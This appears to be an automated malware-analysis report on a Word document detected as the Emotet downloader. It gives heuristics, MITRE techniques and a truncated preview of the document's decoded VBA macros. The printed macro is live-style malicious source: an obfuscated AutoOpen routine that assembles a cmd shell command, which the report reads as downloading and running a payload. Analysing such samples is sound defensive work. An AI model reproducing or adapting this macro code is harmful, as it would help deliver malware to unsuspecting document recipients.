MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample was detected as Emotet by ClamAV and contains VBA macros, including an AutoOpen macro, which are common for this family. The AutoOpen macro attempts to execute a shell command by concatenating strings, likely to download and run a secondary payload. The presence of legacy WordBasic markers further supports the malicious nature of the document.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6803955-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6803955-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5654 bytes |
SHA-256: d4c230babd4acd805a1aa4db0b2dd430e0cb869655d01d08ef6e5cba3c58bbf6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sDOZivbn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate wBPlM
AppActivate 2879
AppActivate Hex(NoPWBD)
AppActivate Sgn(GGVzB)
AppActivate CSng(28893 + KzluMZ)
Shell@ CVar("cm") + OMbBwQUYnZAhjs + UctCBAcBmcE + NZwBAP + MVNYwp + KsMaLTjBlU + EWibjRcwwOk + WMjXjSfhh, 580251827 - 580251827
AppActivate mKiIIo
AppActivate ChrB(JGYhJa)
End Sub
Attribute VB_Name = "sBFWiOvbYOpsi"
Function NZwBAP()
On Error Resume Next
AppActivate 4652
AppActivate CInt(pOnRI)
KJAzDljQ = "d /" + "V:O/C" + CStr(Chr(itdGiziA + ijjNAUZrCRBqkY + 34 + wGjwVIKSchcVB + DTIiZnnI)) + "s" + "et x28L=" + "jkHlL" + "JzFTWVO" + "Qz"
AppActivate Round(1)
AppActivate 9
HUGjV = "hzXBmUhjjH" + "kR\5PvK@" + "n-9i" + "'0uy1" + ".}6" + "a" + ") " + "="
AppActivate 420444513
AppActivate CBool(siuLLl - IwtUr + jiPVtd / 35839)
ctcPzGiAi = "sfw38/gN" + "x" + "Z(:qp+Gtdb" + "$r;DCeco,{" + "S"
AppActivate Tan(ZcsBo)
AppActivate Sin(wbczY)
AppActivate Hex(1)
SNEdEUIaXuj = "&&for %D " + "in (6" + "1,74," + "50,72," + "68,4" + "8,20,72,3," + "3,46,67,6"
AppActivate Chr(isOKf + 21139 - BMRAo / biVCVR)
AppActivate CLng(97)
AppActivate CBool(wOFwtv - 77527 + 53179 - vunlU)
GFrVfK = "6,22,6" + "0,47,32," + "72,50,3" + "3" + ",74" + ",66,22" + ",72" + ",73," + "64,46,55" + "," + "72,64,41" + ",9,7"
AppActivate WFXHi
AppActivate Round(XIzUB)
ihtDrZlBAqw = "2,66,71,3," + "3" + "5,72," + "32,6" + "4,69,67,68" + ",17" + ",65,47" + ",36,20,6" + "4,64,61," + "59,53," + "53,2"
AppActivate 6
AppActivate 4730
AppActivate QRDju
dcBwWHi = "4,20,44,3" + "2,44,32,65" + ",18,38" + ",72,1" + "5,1" + "5,35," + "32,41,73," + "74" + ",18," + "53,25,"
AppActivate 946
AppActivate CByte(UQRjwm)
nzZIM = "37,17,39" + ",35,11" + ",5" + "1" + ",66" + ",3"
AppActivate Int(LKJvw * McjwVj)
AppActivate CByte(15)
pSVwKQ = "1,20,64" + ",64,61,5" + "9,53,53," + "61,4" + "4,68,35" + ",48," + "72,3,41" + "," + "6" + "1,3," + "5"
AppActivate CStr(23966 + hMnmHl)
AppActivate ChrB(NVRlt)
tiBNbNpOsd = "3,5,7" + "4,1" + "1,56,19,7" + "7,5" + "7" + ",15,31,20," + "64,64"
NZwBAP = KJAzDljQ + HUGjV + ctcPzGiAi + SNEdEUIaXuj + GFrVfK + ihtDrZlBAqw + dcBwWHi + nzZIM + pSVwKQ + tiBNbNpOsd
AppActivate ChrW(KGfwk)
AppActivate CFHulw
AppActivate 543
End Function
Function MVNYwp()
On Error Resume Next
AppActivate YMtdcl
AppActivate Atn(2617)
oQUksbuj = ",61,59,53" + "," + "53,35,18" + ",7" + "2" + ",54,35,73" + ",44,41,73" + ",74,18,53," + "56,2" + "3,63,34,4" + "0,1" + "7,31,"
AppActivate CByte(143549204)
AppActivate Tan(414)
VVociqMmj = "20,6" + "4,64" + ",61,59," + "53" + ",53,22,65," + "7" + "3,44,41,35" + ",32"
AppActivate Round(rHdiD)
AppActivate CDbl(wTjSub)
ICTEz = ",53,73," + "38,52" + ",48," + "20,24" + ",50,3" + "1,20,64,64" + ",61," + "59,5" + "3,53,73,7" + "4,32,4" + "8,74" + ",68,73,"
AppActivate DomMT
AppActivate icinM
AppActivate aMARG
YAHFR = "35,74," + "48,48,72" + ",6" + "8,6" + "8,44" + ",54,44" + ",38,73," + "20,44,41,7" + "3,74," + "18,41,66" + ",68,53,43," + "43,64,19," + "10,36,41"
AppActivate 4069
AppActivate Sqr(63420 * RzEdaj)
luibthqAY = ",77,61" + ",3,35,64,5" + "8,36,31," + "36,45,69" + ",6" + "7,22,19,3" + "8," + "46" + ",47,46," + "36,43,27"
AppActivate Cos(IuFaQs * vCSCtZ * CjiHO * IJOvoW)
AppActivate Tan(jAdzp / fXzOW)
CGQkUKMiZWw = ",27," + "36,69,67" + ",18" + ",29,64," + "4" + "7,67," + "72,32" + "," + "29,59,64," + "72,18," + "61,62,3" + "6,26,36,6" + "2,67,22"
AppActivate 9160
AppActivate wBiBr
AppActivate wwbmk
HVNjKCMiA = ",1" + "9,38," + "62,36,41" + ",72," + "56,7" + "2" + ",36,69,4" + "9,74,68,72" + ",44,73" + ",20,5"
MVNYwp = oQUksbuj + VVociqMmj + ICTEz + YAHFR + luibthqAY + CGQkUKMiZWw + HVNjKCMiA
AppActivate Round(57721 - EmECNE)
Ap
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.